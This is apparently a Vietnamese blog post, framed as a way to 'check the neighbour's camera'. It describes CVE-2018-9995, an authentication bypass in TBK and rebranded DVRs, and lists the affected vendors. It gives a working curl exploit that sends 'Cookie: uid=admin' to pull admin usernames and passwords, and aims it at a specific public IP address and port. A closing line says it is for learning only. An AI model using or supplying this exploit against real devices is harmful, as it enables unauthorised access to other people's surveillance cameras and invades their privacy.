Cách check cam nhà hàng xóm :)

Cách check cam nhà hàng xóm :)

Mình chia sẻ cái này mong anh em sử dụng để học tập chứ đứng nghịch ngợm gây ảnh hưởng người khác nhé. Bài viết được tham khảo nhiều nguồn.

1. Lỗ hổng CVE-2018-9995:

 – Chuyên gia người Argentina Ezequiel Fernandez đã tiết lộ 1 lỗ hổng có thể khai thác bằng công cụ GetDvR có thể truy cập các thiết bị IoT bằng cách khai thác một lỗ hổng nguy hiểm vượt quyền xác thực và lấy được bản rõ (cleartext) cho mật khẩu tài khoản admin. Ông chịu trách nhiệm về công cụ tấn công này và chứng minh cho mọi người thấy việc khai thác nó dễ dàng như thế nào
 – Lỗ hổng này tồn tại trên các thiết bị TBK DVR4104 và DVR4216 cho phép kẻ xấu có thể vượt qua việc xác thực tài khoản và lấy được mật khẩu user admin bằng cách gửi yêu cầu có chứa các thông tin “Cookie: uid=admin”, thiết bị sẽ phản hồi lại các thông tin mà kẻ xấu yêu cầu thông qua dữ liệu json.
 – Điều này có nghĩa là kẻ tấn công có thể sử dụng điểm yếu được phát hiện trong thiết bị DVR bằng cách sử dụng cookie được tạo thủ công. Kết quả là thiết bị sẽ phản hồi bằng thông tin đăng nhập của tài khoản Administrator/Admin trên thiết bị. Điều này có khả năng cho phép tin tặc máy tính tự động hóa quy trình này bằng một tập lệnh.
 – Báo cáo ban đầu cho thấy lỗ hổng CVE-2018-9995 chỉ ảnh hưởng đến các thiết bị do TBK sản xuất. Tuy nhiên trong một bản cập nhật sau, danh sách này được cập nhật với các nhà cung cấp khác, nhiều người trong số họ đã được tìm thấy lỗ hổng trên các thiết bị TBK. Các nhà cung cấp đã đưa ra danh sách các phiên bản bị ảnh hưởng bên dưới:

  • Novo
  • CeNova
  • QSee
  • Pulnix
  • XVR 5 in 1
  • Securus
  • Night OWL
  • DVR Login
  • HVR Login
  • MDVR Login

2. Vận dụng lỗ hổng như thế nào?

curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

Ví dụ chúng ta tìm được IP: http://59.18.152.180:9000. Bây giờ mình sẽ khai thác lỗ hổng tìm để user/password đăng nhập vào Camera này.

curl "http://59.18.152.180:9000/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

Sau khi chạy lệnh trên ta được kết quả như sau:

  • Trong đó uid và pwd chính là tên đăng nhập và mật khẩu có được. Sau khi có được thông tin trên chúng ta sẽ truy cập vào url http://ip:host để đăng nhập.

3. Tổng kết:

Bài này mình cũng đi tham khảo một số nguồn nên chia sẻ cho anh em. Mong anh em sử dụng vào mục đích học tập và tìm hiểu.